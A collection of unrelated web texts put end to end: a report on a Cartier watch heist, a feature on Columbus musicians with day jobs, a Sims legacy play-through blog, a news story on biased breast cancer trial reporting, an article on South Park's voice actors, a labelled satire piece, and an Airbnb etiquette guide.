John Brecher / NBC News A window display at Cartier at 5th Ave and 52nd St. in New York City .
Two men who allegedly stole 16 luxury watches in a brazen midday “ smash and grab ” heist of a Cartier jewelry store in New York City were arrested on Friday and charged with robbery .
Police said the duo was among five men wearing masks who walked into the high-end jewelry store on an always-bustling Fifth Avenue shortly after noon on Thursday , smashed display windows and scooped up the watches , which were worth about $ 710,000 , said New York Police Department Officer Adam Navarro .
Allen Williams and Roberto Grant , both 33 , were arrested on Friday , with Williams charged with robbery in the second degree and criminal possession of stolen property , and Grant , charged with robbery in the second degree .
New York City Police Commissioner Bill Bratton said some of the watches were recovered during Friday 's arrests , according to NBC New York .
Police were still seeking the other three men in the group . No one was harmed during the heist , Navarro said .
Police were searching “ everywhere ” for the men and their expensive plunder , and Cartier employees were “ lending any possible help , ” he said .
On a recent Monday in early December , Sean Gardner , singer/guitarist for Winter Makes Sailors and Bookmobile , struggled to tame an unruly crowd .
On a recent Monday in early December , Sean Gardner , singer/guitarist for Winter Makes Sailors and Bookmobile , struggled to tame an unruly crowd .
`` Can you guys [ in the back ] move up a bit , '' he said . `` I do n't want you to get trampled . ''
Though it sounded like the musician could have been addressing the audience at a rowdy club gig , he was actually directing a classroom of third graders in his role as an associate teacher at Gahanna 's Columbus Academy , positioning the students so everyone had a clear view of an oversized map of Franklin County .
Every day , Columbus musicians wake up - occasionally bleary-eyed from late-night gigs - and fan out across the city , applying the same talents they share onstage ( creativity and an ability to adapt on the fly included ) to a wide range of fields and professions . Yes , many works as bartenders , servers and coffee baristas , since the flexible schedules tend to coordinate well with the odd hours many musicians keep , but they 're also educating the young , working as delivery drivers and , in at least one case , handling cybersecurity for major financial institutions .
Growing up , Gardner , 36 , always had an interest in teaching , but it was n't until he got married in 2010 that he decided to pursue a full-time career in the classroom . Initially he thought it would be an easy transition - `` If you 're good at entertaining you feel like you should be able to lead a classroom , '' he said - but he soon discovered the heightened responsibilities that go hand-in-hand with the job .
`` The smallest mistakes can really touch a child , '' said Gardner , who incorporates his love of music into everything from his classroom décor ( one bulletin board displayed student work under the header `` Red Hot Chili Papers '' ) to his method of getting his students ' attention ( striking a single note on a handheld chime ) . `` When I make a mistake in front of an audience I 'm like , 'Eh , I 'll get to do this again . ' But kids remember everything you do , and that hit me pretty hard early on . You really have to be careful and keep in mind the views of every child . ''
Unlike Gardner , who grew up idolizing teachers and always had an interest in the profession , Bummers singer/guitarist Jeff Pearl generally detested school , so when his mom suggested he pursue a career in education his initial reaction was , `` Ehhh , we 'll see , '' which , judging by his tone , translated roughly to `` Are you out of your mind ? ''
A Valentine 's Day visit to the Harmony School in Bloomington , Indiana , altered this perception .
`` All the teachers were onstage with the kids covering all these Beatles songs for the parents , and I was blown away , '' said Pearl , 30 , who is currently in his second year teaching kindergarten at St. Vincent Family Center in Olde Towne East following a stretch at Cranbrook Elementary and a stint teaching English and debate in South Korea . `` I thought , 'Well , if I can take my love of music and have fun with it… ' ''
Teaching has turned out to be an ideal fit . The guitarist described himself as `` a goofball , '' admitted he has the artistic skills of a 6-year-old ( `` A lot of these drawing are mine , '' he said waving to some crude sketches tacked to the classroom bulletin board ) and said he regularly tells his students growing up is the worst thing he 's ever done .
`` These kids just understand me , '' he said . `` And I get them . ''
Like Gardner , Pearl regularly incorporates music in his lesson plans , and he said most days he totes a guitar to work . He also taught the kids how to read the calendar with a `` Hip-Hop Days of the Week '' song . Alternately , the students have inspired a couple of Bummers tunes ( `` A kid will say a weird phrase and I 'll say , 'Oh , I 'm going to make that a song , ' '' he said ) , and his class has evolved into something of a burgeoning fan base for the rising surf-rock crew .
`` If [ the students ] want a treat I 'll be like , 'What 's the greatest band ever ? ' '' he said . `` And they 're like , 'Bummers , dude ! ' ''
While Gardner and Pearl could accurately be termed musicians-turned-educators , Samantha Kim described herself more as a lifelong teacher who stumbled onto a side career in pop music . At 10 years old the local violinist shadowed her sister 's high school orchestra teacher for Take Your Daughter to Work Day ( `` Even though he was n't my father , '' she said ) , and the experience cemented her desire to pursue a career in music education .
`` I do n't think most kids decide on [ a career ] that early , '' said Kim , 29 , who currently works as an orchestra director at a public school in Granville in addition to playing in the folk-leaning Ghost Shirt . The musician will also be performing at the fourth annual Beatles Marathon , which takes place at The Bluestone on Saturday , Dec. 28 . `` When I was younger it was because I loved music so much I wanted to be around it all the time . Now that I 'm well into my career it 's become so much more . I know it sounds cheesy , but I get to be a part of whom [ the students ] are , and they become a part of who I am . ''
All three educators stressed the difficulty of balancing the demands of the job and band life - `` I do n't sleep , '' Pearl said matter-of-factly - but at the same time all expressed immense pleasure in finding a career so well-tailored to their unique personalities and skillsets .
`` You can put your heart in [ teaching ] , '' Gardner said . `` And that 's why I started playing music . ''
Ryan Vile , who plays keyboard in power-pop collective The Girls ! , actually started playing music for far more analytical reasons . Vile , who described himself as an `` awkward and nerdy looking '' child , tended to gravitate toward more logical pursuits , and he only joined a band because it seemed like a challenge for someone who , in his own words , lacked a real artistic sensibility .
`` Music seemed really extra challenging for me , '' said Vile , 35 , who works in cybersecurity for a bank . `` Now the joke is I sit at a keyboard all day and then go to band practice and stand at a keyboard all night . ''
Even though a career in computer technology appears far-removed from his new role as a gigging musician , Vile said playing in a band has given him a confidence that carries over into his day job , as well as helped him develop his people skills .
Adam Hardy , drummer in rowdy rock duo Cliffs , also attributed his full-time gig as a delivery driver for local clothing company Homage with helping him establish new skillsets .
`` I get to see something that started in a basement evolve into a multinational company , '' said Hardy , 26 , whose knack for loading the band 's tour van has come in handy when packing the company delivery truck ( `` I 'm like a Tetris master '' ) . `` It 's cool to see that transition and then compare that to other things I do in the band , like talking to vendors or to different [ concert ] venues . ''
Watershed singer/guitarist Colin Gawel , 44 , has similarly applied lessons gleaned from a lifetime in rock 'n ' roll to his role as owner of Colin 's Coffee , a small , inviting spot tucked away in an Upper Arlington shopping plaza .
`` You 're always on a budget , so it 's , 'What can we do for free ? ' '' he said . `` We 're on Twitter and Facebook because they 're free , and I think a lot of that comes from being in a band like Watershed where you send out mailings and whatever . ''
After purchasing the shop seven years ago , Gawel also stripped things back to focus on a few key elements ( namely coffee ) because it reflected his more streamlined approach to making music . If he did n't use effect pedals onstage , he reasoned , his business should be similarly free of flash . This sensibility is reflected in everything from the humble sign posted in the parking lot that reads `` Colin is in '' ( `` Literally , Colin is in the shop , '' said the guitarist , who mans the counter most mornings ) to Gawel 's dressed-down wardrobe . On a recent visit in early December he looked something like the protagonist from Radiohead 's animated `` Paranoid Android '' video sprung to life , decked out in jeans and a T-shirt and with a stocking cap perched high on his head .
`` I 've never had [ to wear ] a tie , '' he said , and laughed . `` I do n't know what I 'd do if I was n't here . I 'd probably have more money , but I do n't think I 'd be as happy .
`` It 's that musician 's mentality of , 'It 's lots of work [ and ] fun , but no money . ' So you 're not going to see me rolling around in a Porsche with vanity plates that say 'COFFEEMAN ' anytime soon , but I love it . ''
Previous ( 1.1 & 2.0 ) | Current ( 2.1 ) | Next ( 3.0 )
Welcome back ! Infancy was quick and somewhat painful , but here 's a little one all growed up . This is Delilah , and if you do n't remember from last time , she grows up to be a Hopeless Romantic , Artistic , Clumsy , a Coach Potato , and Insane .
And here 's Danielle . Danielle will grow up to be Ambitious , Friendly , Evil , Neurotic , and a Genius . She seems messed up enough to be an Uglacy heir .
And , unfortunately , I remember taking a picture of little Dalton but for whatever reason it disappeared . Dalton grows up to be Easily Impressed , Good , a Supernatural Fan , Gatherer , and Mean Spirited .
“ Ohmigod ! The Sparkle Gods have come for me again ! Shiny ! ”
Lakesha , no , it 's just your birthday-
“ Take me , Sparkle Gods ! I am not of this world ! ”
I love Lakesha for her neat trait , but she is so not the brightest bulb in the bunch .
Here 's another obligatory toddler photo . I do n't even know why I bother with trying to potty train any of these kids- it 's friggin ' impossible to do in 3 or 4 sim days . I have yet to do it .
“ I have to try to save these poor souls from my potty damnation , do n't you see ? ”
Pfft . It 's useless , dude .
Note the blondie in the back- that 's Dalton .
“ Now , Delilah , since you 're Artistic , I want you to paint pretty pictures like your daddy so you do n't feel so much pain and suffering . Life is hurt , but painting makes it better . ”
You mean better in the way so we can get a washer and dryer .
“ No ! Money is worthless , it just causes more hurt ! Art is expression , art is my life , art expresses my hurt and- ”
It pays your bills .
“ Do n't listen to her- she 's the one who cursed us with potty damnation . ”
“ Gaaah gaaah ! ”
Shortly after this , the sparkles begin . Delilah is the first to go .
Not bad ! Look at those cheeks !
And the sparkles claim Dalton…
And he looks rather normal looking
Now Danielle does the sparkle dance…
And wowza ! Coupled with that Evil trait and those cheekbones… It 'll be an Uglacy in personality AND looks !
And above are the children in CAS- Delilah , Danielle , and Dalton , respectively . Danielle is a looker , I 'll tell you what .
And this is pretty much what happened every night in the Miller household- Dalton and Danielle played chess while Delilah lazed around or painted , and Richard painted depressing nuclear winters and other brilliant paintings , which ended up getting sold immediately to fund our legacy mansion in the works . I feel kind of bad that I have n't saved any of his paintings .
“ Oh ? You have feelings ? That 's surprising . ”
Look , I 'm sorry that you 're just too damn pretty for this legacy and to slave away over paintings that you never can keep , but mark my words , Richard , I can just as easily put the fear of good ol ' fashioned Sims 2 boolprop in you .
“ But that is just legend , that is just a terrible rumor to scare bad little sims- ”
Is it , Richard ? I would think on that .
Feeling shaken by his sudden grasp on his mortality , he decided to do some legacy-lovin ' .
“ Oh , Lakesha , I know that your Uglacy love will heal my scars , fill up the bottomless void that is called my heart , and make me whole again . ”
“ Uhm , okay ! Sounds kinky ! ”
She 's a real prize , Richard .
After Lakesha “ filled Richard 's void ” , she called the repairman to fix her beloved TV . And proceeded to eat in her underwear .
Way to stay classy , Lakesha . I rest my case .
“ The Sparkle God has claimed me ! ”
Oh no , not you too Dalton .
And yeah yeah , I know that he looks like he has a screwed up nose , but it was all a lie . His face returned to normal after I put him through CAS . Sigh .
“ Oh , no , this is it , He has come for me ! ”
Delilah , seriously , he does n't exist…
And wow , do you have the fashion sense .
Danielle looks down . I think she wishes that she was the sparkle god .
“ And I would be a vengeful god ! ”
I 'm sure you would , sweetie .
And here are the post CAS pictures of Delilah , Danielle , and Dalton , respectively . I think Danielle is winning the Ugly contest , and Delilah is winning the ho contest , and Dalton is that one pretentious dooche with the sweater and the flip flops .
“ Whoo-hoo , yeah Dad ! Praise Him ! ”
This is really getting out of hand , guys .
Here 's the upgraded house- we finally have a washer and a dryer ! And this is how most days are- Richard sleeps during the day while Lakesha paints her heart out , and when Lakesha sleeps Richard paints . Hey , Hey , I know that I run a tight ship , but come on , money does n't grow on trees ! ( anymore , anyway… )
Dalton seems to be gettin ' his Uglacy romance AWWHN !
“ Hey , uhm , your eyes , and mine , well , like , shooting stars ? I like , uh , them . Pretty . ”
“ Oh , Dalton , you always know what to say ! ”
She even did n't mind when Richard decided to fix the dishwasher in the nude . Real classy , Richard .
“ Being without clothing is the only freedom I have in this house ! Why was I born into servitude ? ? ! ”
Seriously , Richard walked around in his underwear/in the nude for the rest of his sim life . He ceased to give a single f $ # % about life .
And here 's Richard getting claimed by the Sparkle Gods again , in the nude . ( my game crashed , gurr )
“ That 's what you get from not paying tribute to the Sparkle Gods ! ”
Right .
And everyone decided they needed to wake up and gather into their parent 's bedroom to watch the Sparkle Gods lay claim to Lakesha 's adulthood . I should really do the whole birthday party thing , but everyone ages on the same day and time is precious . We need no stinkin ' birthdays .
On a side note , here 's the updated version of the house , after we sold a few paintings .
On another side-note , Delilah got her mother 's brains .
“ Uhm , hello , how can I get to the sink from here ? ”
Uh , well , walk a couple of steps , sweetie .
And here are some of the photos from their teenhood , with Danielle gossiping and swapping spit with her boyfriend , the teens diligently working on their skills , and Danielle getting a great view of Dalton 's butt while he makes his moves in front of the TV .
And the sparkles lays claim to youth once again .
And , seriously , Richard is as creepy as Gordon . Watching his daughter be sparkled into adulthood in the nude is a little off .
“ It 's called peaceful protest , man ! ”
Is that what you call it ? Well , in my world we call it pedophilia . Weirdo .
Here 's Danielle and Delilah , respectively . I decided to have Delilah 's formal be her casual wear and her casual wear be formal since she 's insane- just made sense that way .
But it looks like they are growing into their ugly , a little bit . Which is sad . I did n't bother with Dalton because he 's moving away to the house nextdoor- he 's just not Uglacy material .
And off to graduation they go !
After graduation , Danielle had to break the news .
“ Okay , like , uhm , dude , you 're a great kisser and everything , but you just are n't ugly enough . So bye . ”
“ What ? ! ! ? ! But I… but I… I took you to the prom ! ”
“ Big whoop . Now get off my property . ”
Now time to look for ugly spouses !
Okay , seriously , all of these Townies are genetic gifts from the Sparkle God . None of them were ugly . In fact , the ugliest one was the last guy , and it was just because he was fat !
And so , if you have n't noticed already , I have decided that Danielle should be the heir . She 's ugly enough , but her personality is the ugliest , and thus she wins .
And so she swoops in on the “ ugliest ” guy in town .
“ I would enjoy seeing your insides fizz like soda… does that turn you on , baby ? ”
“ Or perhaps you would rather want me to lay claim to your body , like Neil Armstrong ? ”
I 'll take that as a yes .
The beautiful gift of Uglacy Romance aside , that is the last masterpiece Richard ever painted , as his soul was laid claim by the Grim Reaper that day .
And yes , I did sell it . What ? We needed a workbench to help fulfill a LTW !
“ My old , broken heart ! He was right… . life is hurt ! ! ”
Lakesha proceeded to pass out here , get up , and uhm…
Fainted right here , too .
Poor soul loved Richard with all of her heart .
Now back to business…
“ Let me show you how a real woman puts the woo in hoo ! ”
I had them WooHoo a few different times because I did n't hear a lullaby . I was freaking out to myself , thinking that this guy is sterile or something , but…
Danielle 's regular vomitting quelled my rising panic .
“ So , you should be my husband since I bear your child . ”
Yeah , and the fact that he has a rich trait !
“ No way ! You 're family 's too weird . I 'll give that woohoo another shot , though ; ) ”
“ Uhm , well , what about moving in ? ”
“ Do we get to woo hoo more ? ”
“ I guess ? But there will be many of my spawn running around here soon and- ”
No ! Lie ! Lie !
“ Oh , yeah , so… Yeah ! More woohoo ! ”
“ Oh , okay , that sounds good . ”
Pffft . Men .
And promptly after , he sparkles into an elder . Just great . When he moved in he gave us about $ 4,000 , and I guess that 's okay , but he 's unemployed and has no skills whatsoever . You are only here for your ugliness , pal ! Expect to cook and clean until the Grim Reaper claims your soul .
After he moved in , I had Dalton move out with his Fiance . Go enjoy your normal un-Uglacy life .
“ Let 's get out of here as soon as possible… ”
And Delilah was touched by the Sparkle God ( shortly after being shocked by trying to upgrade a stereo )
And Danielle , full of babies ( she was in front of that couch watching kids TV nearly the whole time with kids music playing ) , is going into labor .
“ Oh god ! I 'm too old for this ! ”
You 're telling me .
Well , that 's it for this chapter ! Stay tuned to see the next generation of Uglies !
Previous ( 1.1 & 2.0 ) | Current ( 2.1 ) | Next ( 3.0 )
Not all patient drug trials published in even the most prestigious of medical journals can be taken as gospel , say researchers , who have found a high proportion of `` spin and bias '' in the reporting of results .
Researchers at Princess Margaret Cancer Centre reviewed 164 breast cancer trials . They found that in studies that reported no real benefit of treatment , a large proportion focused on less important outcomes to give a more positive spin to results .
Negative studies are dressed up to look as though they may be positive , says Dr. Ian Tannock . ( University Health Network/Canadian Press )
Of 92 trials that had negative primary outcomes , about 60 per cent used some secondary measures , `` often trying to make the study look positive , though it really was not , '' said medical oncologist Dr. Ian Tannock , who led the study published this week in the Annals of Oncology .
`` Sometimes studies that are basically negative studies are a little bit dressed up to look as though they may be positive , '' Tannock said Wednesday . `` It 's like the politicians . Trying to make things look better than they are . ''
The Toronto study focused on what 's known as a trial 's `` abstract , '' the summary of how the research was done and its major results and side-effects . The key result is the `` endpoint '' — in this case , whether the drug in question did what it was supposed to do in patients or not .
The 164 studies appeared between 1995 and 2011 , many of them in premier medical publications like the Journal of Clinical Oncology , Lancet Oncology and the New England Journal of Medicine . All were randomized control trials of at least 250 patients each , which typically tested a new drug or compared a new drug to an existing medication .
Serious side-effects poorly reported
Tannock said some published reports of breast cancer treatment trials also downplayed or under-reported the incidence of toxic side-effects experienced by patients taking a drug being investigated .
In two-thirds of the reports , there was bias in the way adverse effects of the treatment were reported , with more serious side-effects poorly reported , the authors say . That was particularly true for trials that showed a significant benefit of a treatment .
`` If there was an improvement in survival or time to the progression of the disease , they often omitted any statement about toxicity , even though in many cases there was a substantial increase in toxicity , '' Tannock said .
`` And , of course , that 's important because if you have a new treatment that on average improves survival for patients with metastatic [ spreading ] cancer by , say , three months and the treatments are fairly equivalent in terms of side-effects , that 's an important advance .
`` But if [ a drug ] improves survival but with a major increase in toxicity , I would say that was a very questionable advance . ''
The study also tried to determine whether misreporting was more likely if a trial was funded by the pharmaceutical company whose drug was being tested . But Tannock said `` we did n't find that , at least not at a statistically significant level . ''
However , commercial sponsorship of trials is n't always disclosed in reports of results , he said .
Both pharmaceutical companies looking to sell new under-patent drugs — often with higher price tags than older off-patent generic agents — and researchers hoping for a successful trial outcome may both be at fault , he said .
`` There is a subtle pressure on academic investigators to publish studies that will be noticed . ''
Tannock said it 's critical that summaries of published clinical trials accurately report how efficacious a drug is in treating breast cancer , in this case , and laying out the severity of side-effects patients might have to endure with the treatment .
Often , the summary is all that busy doctors have time to read carefully , he said .
`` Some physicians may be persuaded to use a new or different treatment than the standard because they have read papers that suggest that this is a better treatment when it may not really be a better treatment , '' he said .
South Park creators creators Trey Parker ( left ) and Matt Stone ( right ) continue to do most of the writing , directing and voice acting on the show .
South Park is an American adult animated sitcom created by Trey Parker and Matt Stone who also do the majority of the voices . [ 1 ] [ 2 ] [ 3 ] Both Parker and Stone do most of the male characters on the show along with April Stewart and Mona Marshall , who do the female characters on the show . Guest stars have lent their voices to the show including Jay Leno , George Clooney , Robert Smith and the comedy duo Cheech & Chong voiced characters representing their likenesses for the season four ( 2000 ) episode `` Cherokee Hair Tampons '' , which was the duo 's first collaborative effort in 20 years . [ 4 ]
Characters in the show , according to Parker and Stone , are inspired by people they met when they were kids . Stan Marsh is made based on Parker himself while Kyle Broflovski is based on Stone himself . [ 5 ] [ 6 ] [ 7 ] Eric Cartman is partially named after and based on Matt Karpman , a high school classmate of Parker who remains a friend of both Parker and Stone . [ 8 ] Cartman is also inspired by All in the Family patriarch Archie Bunker , of whom Parker and Stone are fans . They state that creating Cartman as a `` little eight-year-old fat kid '' made it easier for the two to portray a Bunker-like character after the introduction of political correctness to late-20th century television . [ 9 ] [ 10 ] Kenny McCormick was based on the creator 's observation that most groups of childhood friends in small middle-class towns always included `` the one poor kid '' and decided to portray Kenny in this light . [ 11 ] Butters Stotch is loosely based on South Park co-producer Eric Stough . [ 12 ]
Some of the original voice actors left the show . Mary Kay Bergman voiced the majority of the female characters until her suicide on November 11 , 1999 . Mona Marshall and Eliza Schneider succeeded Bergman , with Schneider leaving the show after its seventh season ( 2003 ) . She was replaced by April Stewart , who , along with Marshall , continues to voice most of the female characters . Issac Hayes , who voiced the character Chef , left the show after Parker and Stone 's depiction of his religion Scientology in the episode Trapped in the Closet . [ 13 ]
Current cast [ edit ]
Parker and Stone voice most of the male South Park characters . [ 2 ] [ 14 ] [ 15 ] Mary Kay Bergman voiced the majority of the female characters until her suicide on November 11 , 1999 . Mona Marshall and Eliza Schneider succeeded Bergman in 2000 , with Schneider leaving the show after its seventh season ( 2003 ) . She was replaced by April Stewart , who , along with Marshall , continues to voice most of the female characters . Bergman was originally listed in the credits under the alias Shannen Cassidy to protect her reputation as the voice of several Disney and other kid-friendly characters . [ 16 ] Stewart was originally credited under the name Gracie Lazar , [ 17 ] while Schneider was sometimes credited under her rock opera performance pseudonym Blue Girl . [ 18 ]
Other voice actors and members of South Park 's production staff have voiced minor characters for various episodes , while a few staff members voice recurring characters ; supervising producer Jennifer Howell voices student Bebe Stevens , [ 15 ] co-producer and storyboard artist Adrien Beard voices the school 's only black student , Token Black , [ 19 ] writing consultant Vernon Chatman voices an anthropomorphic towel named Towelie , [ 15 ] and production supervisor John Hansen voices Mr. Slave , the former gay lover of Mr . Garrison . [ 20 ] Animation director and producer Eric Stough also voices Kenny McCormick `` un-muffled , '' in the few episodes where the character does not wear his trademark parka that normally muffles his voice . [ 21 ] Throughout the show 's run , the voices for toddler and kindergarten characters have been provided by various small children of the show 's production staff . [ 22 ]
When voicing child characters , the voice actors speak within their normal vocal range while adding a childlike inflection . The recorded audio is then edited with Pro Tools , and the pitch is altered to make the voice sound more like that of a fourth grader . [ 23 ] [ 24 ] [ 25 ]
Isaac Hayes voiced the character of Chef , a black , soul-singing cafeteria worker who was one of the few adults the boys consistently trusted . [ 26 ] [ 27 ] Hayes agreed to voice the character after being among Parker and Stone 's ideal candidates which also included Lou Rawls and Barry White . [ 28 ] Hayes , who lived and hosted a radio show in New York during his tenure with South Park , would record his dialogue on a digital audio tape while a respective episode 's director would give directions over the phone , then the tape would be shipped to the show 's production studio in California . [ 29 ] After Hayes left the show in early 2006 , the character of Chef was killed off in the season 10 ( 2006 ) premiere `` The Return of Chef '' .
Guest stars [ edit ]
Celebrities who appear on the show are usually impersonated , though some celebrities lend their voice to their characters . Celebrities who have voiced themselves include Michael Buffer , [ 30 ] [ 31 ] Brent Musburger , [ 32 ] Jay Leno , [ 33 ] Robert Smith , [ 34 ] and the bands Radiohead and Korn . [ 35 ] [ 36 ] Comedy team Cheech & Chong voiced characters representing their likenesses for the season four ( 2000 ) episode `` Cherokee Hair Tampons '' , which was the duo 's first collaborative effort in 20 years . [ 4 ] Malcolm McDowell appears in live-action sequences as the narrator of the season four episode `` Pip '' . [ 37 ]
Jennifer Aniston , [ 38 ] Richard Belzer , [ 39 ] Natasha Henstridge , [ 34 ] Norman Lear , [ 40 ] and Peter Serafinowicz [ 41 ] have guest starred as other speaking characters . During South Park 's earliest seasons , several high-profile celebrities inquired about guest-starring on the show . As a joke , Parker and Stone responded by offering low-profile , non-speaking roles , most of which were accepted ; George Clooney provided the barks for Stan 's dog Sparky in the season one ( 1997 ) episode `` Big Gay Al 's Big Gay Boat Ride '' , [ 42 ] Leno provided the meows for Cartman 's cat in the season one finale `` Cartman 's Mom Is a Dirty Slut '' , [ 42 ] and Henry Winkler voiced the various growls and grunts of a kid-eating monster in the season two ( 1998 ) episode `` City on the Edge of Forever '' . [ 43 ] Jerry Seinfeld offered to lend his voice for the Thanksgiving episode `` Starvin ' Marvin '' , but declined to appear when he was only offered a role as `` Turkey # 4 '' . [ 44 ]
Trey Parker [ edit ]
Trey Parker voices four of the main characters : Stan Marsh , Eric Cartman , Randy Marsh and Mr. Garrison . He also provides the voices of several recurring characters , such as Clyde Donovan , Mr. Hankey , Mr. Mackey , Stephen Stotch , Jimmy Valmer , Timmy Burch , Tuong Lu Kim and Phillip .
Matt Stone [ edit ]
Matt Stone voices three of the main characters : Kyle Broflovski , Kenny McCormick and Butters Stotch . He also provides the voices of several recurring characters , such as Gerald Broflovski , Stuart McCormick , Craig Tucker , Jimbo Kern , Terrance , Saddam Hussein , Tweek Tweak , Mr. Adler and Jesus .
Mona Marshall [ edit ]
Mona Marshall voices Sheila Broflovski and Linda Stotch .
April Stewart [ edit ]
April Stewart voices Liane Cartman , Sharon Marsh , Carol McCormick , Shelley Marsh , Mayor McDaniels , Principal Victoria and Wendy Testaburger .
List [ edit ]
Recurring guest voices [ edit ]
The recurring guest voices include John Hansen , Vernon Chatman , Adrien Beard and Jennifer Howell .
Casting changes [ edit ]
Mary Kay Bergman voiced the majority of the female characters until her suicide on November 11 , 1999 . Mona Marshall and Eliza Schneider succeeded Bergman in 2000 , with Schneider leaving the show after its seventh season ( 2003 ) . She was replaced by April Stewart , who , along with Marshall , continues to voice most of the female characters . Isaac Hayes , who voiced the character Chef , left the show after Parker and Stone 's depiction of his religion Scientology in the episode `` Trapped in the Closet '' .
As the effects of climate change continue to be felt across the nation , Washington and Massachusetts have just announced an innovative trade deal to help combat it in their states .
Governor Jay Inslee 's office released a statement today revealing that he has reached a deal with Governor Charlie Baker of Massachusetts to buy 2,000 tons of the Eastern state 's snow , which has accumulated to record levels in the northeastern states . In exchange , Washington will provide 300 inflated footballs to the New England Patriots , who were discovered during the AFC championship game against the Indianapolis Colts in January to have difficulties keeping their footballs inflated to the proper amount .
Washington has struggled with a severe shortage of snowfall this Winter , while the states of New England have been burdened with too much .
Earlier this week , the Summit and Alpental ski resorts near Seattle posted on their website that they are now `` temporarily closed until the slopes can be repaired with man and machine power or mother nature blesses us with significant snowfall . '' Meanwhile , Boston residents have had to ski , sled , and snowshoe their way to work and school frequently over the last few months .
Pacific Northwest skiers , snowboarders , and sledders are overjoyed at the news .
`` With no snow this year , I 've been forced to get my exercise by hiking , biking , and walking in 60 degree weather , '' says Seattle-area resident Jinny Scintera . `` I 'm going positively stir-crazy ! ''
Boston-area residents are equally excited about their ability to begin driving with wild abandon again . `` It 's not nearly as much fun cutting off snowshoers , '' says Natick native Blake Flanagan .
Although not direct beneficiaries of the deal , fans of the Indianapolis Colts have taken to social media to express their enthusiasm for the trade using the hashtag # SnowForFootballs . Pawnee , IN resident and Colts fan @ bobbyknightranger tweeted about the news , `` Level playing field next year , # Patriots ! We 're going to make you cry like you 're at a funeral or the Grand Canyon . # ColtsNation # SnowForFootballs '' .
Seattle football fans are not quite as happy : Inslee was unsuccessful in his attempt to add an amendment to the deal that would allow the Seattle Seahawks to re-do their universally reviled , strategically unsupportable , and unbelievably ridiculous last play call of Superbowl XLIV .
Note : this piece is satirical . No skiers , bikers or footballs were harmed during the writing of this article .
This post contains affiliate links , which means we may receive a commission if you click a link and purchase something that we genuinely recommend . While clicking these links wo n't cost you any extra money , they will help us keep this site up and running ! Thank you for your support !
If you 're new to using Airbnb for accommodation , you might have some questions like whether you can eat the food at your Airbnb or what the checkout etiquette is . After staying at over 30 Airbnbs and being an Airbnb host myself , I can ease your anticipation with some simple Airbnb etiquette guidelines . Here are tips for staying at an Airbnb along with answers to frequently asked questions .
Related Post : If you 're new to Airbnb and want to know what it is or why it 's better than a hotel befpre jumping into Airbnb etiquette , check out this post .
Most Important Airbnb Etiquette Tips
Tip 1 : Communicate , Communicate , Communicate
Communication is the most important aspect in Airbnb etiquette . It helps with quite a few situations .
Before booking the Airbnb – If you 've got your eye on an Airbnb but have a hesitancy about it , then reach out to the owner and talk it out . If they 're a good host , they 'll usually get back to you as soon as they can and answer whatever questions you have that are n't on the listing .
After booking / before arrival – This is the most crucial time for communication between the host and you . During this time , your host and you will talk out when you will be arriving and when you need to check out .
The arrival part is quite important because unlike a hotel , there wo n't be a concierge to check you in , and you may not have cell service to get in touch with the host at arrival . So talking out when and where to meet before you get there will make the start of your trip much smoother .
Pro Tip : Write their address and number down on paper just in case your phone stops working , and you get lost on the way to their place .
At arrival – When you arrive , the host will show you the house rules and around the apartment . Ask all the questions you want and need to make yourself at home !
During your stay – There 's really not much need for communication here , but sometimes hosts like to know how you 're doing and check in . When or if you have time , just reply with a simple , “ Great . Thanks. ” or if there 's an issue , make sure to let them know .
They would much rather make your stay pleasant and fix the problem ASAP instead of getting a sorry review later on that they ca n't do anything about .
At checkout – Let your host know when you leave just like you would at a hotel . A simple text or message on the app is good enough !
View from our Airbnb of the Mediterranean Sea above Vernazza , Cinque Terre , Italy
Tip 2 : Read the House Manual
If there 's a house manual , cuddle up on the couch with that baby… if there 's a couch .
First of all , there 'll probably be the wifi network and password on it , and if you 're like me , you 'll be fiending for the internet to find the best restaurant near you to cure your jetlag .
Tip : Do n't forget to use a VPN while traveling to keep your info from possibly getting hacked .
Second , it 'll outline some simple house rules letting you know what 's ok and not ok to do . The rules are generally fairly simple , and at most , involve you putting your dishes in the dishwasher when you leave and taking out the garbage .
Also , if you 're looking to invite some newly found local friends over for a party but not sure if it 's ok , this is where you usually find out if they have neighbors who care about you blasting loud music , and basically , having fun after a certain time .
If they do have a quiet time , please respect it ! If the neighbors start meddling into the host 's Airbnb affairs , then their awesome rental might not be available to anyone else in the future . # dontf * ckthisup
Lastly , sometimes hosts throw in their manual local insights on what to do and where to eat in the area .
Yaaaas to the sweet bonus you get from booking with Airbnb– all the local goodies !
Tip 3 : Respect the Airbnb
Fun at our Airbnb in Tuscany , Italy
Have your fair share of fun , but definitely respect the place . Most of the time , you 're either vacationing in someone 's rental apartment or straight up in someone 's home that they left just for the weekend and rented to you 'cause they needed some extra cash .
Either way , respect the place ! This is someone 's livelihood we 're talking about .
Keep it clean .
Put things back where they belong .
Turn off the lights when you leave the apartment .
Turn down the heat or the AC up a degree or two ( if you want to be extra green and conscious of the owner 's bills ) .
In terms of food and drink in the Airbnb 's cabinets and refrigerator , here 's my general rule of thumb . If it 's purely a rental home , which you can tell by the lack of personal items in their place , then really anything goes .
Usually previous Airbnb'ers leave small things behind like pasta , rice , olive oil , and garlic so as long as it 's not rotting , feel free to dive in .
Also , generous hosts will let you know if they 've left food for you . At one Airbnb , I got champagne and mozzarella balls while at another , I got eggs , fresh butter , muffins , bread , crackers , cookies , and SO many other things . # jackpot # nomnomnom
If it 's actually someone 's home , which you can tell about how much stuff there is everywhere ( photos of their significant other , all their clothes in the closet , etc . ) , then unless they told you to indulge in their food and drink , try limiting yourself to the spices in their cabinet , and go grocery shopping for yourself . Checking out local markets and ingredients is the best !
If you HAVE to drink their alcohol or eat their food , make sure it 's not the good wine , and replace what you can .
Tip 4 : Write A Review
After your stay , put the cherry on top of your Airbnb etiquette by writing a review . This will largely help the host by drawing more people in to stay there or letting them know what you liked or disliked so they can keep on improving the Airbnb experience .
Get $ 20 off your first Airbnb with my referral code !
Specific Airbnb Etiquette Questions
Can you eat the food at Airbnb ?
Generally yes but it depends on whether it 's purely a rental home or someone 's home they 're renting out while they 're away . If it 's purely a rental home , I usually eat whatever 's there because they 're probably leftover from previous guests .
If it 's someone 's home they 're renting out while they 're away , then I use spices and basic foods but wo n't touch the expensive stuff .
For more details , check out tip # 3 above .
What 's an Airbnb check out like ?
Checking out of an Airbnb is fairly simple . Most of the time , all you have to do is leave the key designated by the host . Rarely , the host will come meet you himself and get the key from you . Simply ask your Airbnb host how to check out of your Airbnb when you arrive and meet them , or read the manual to find out .
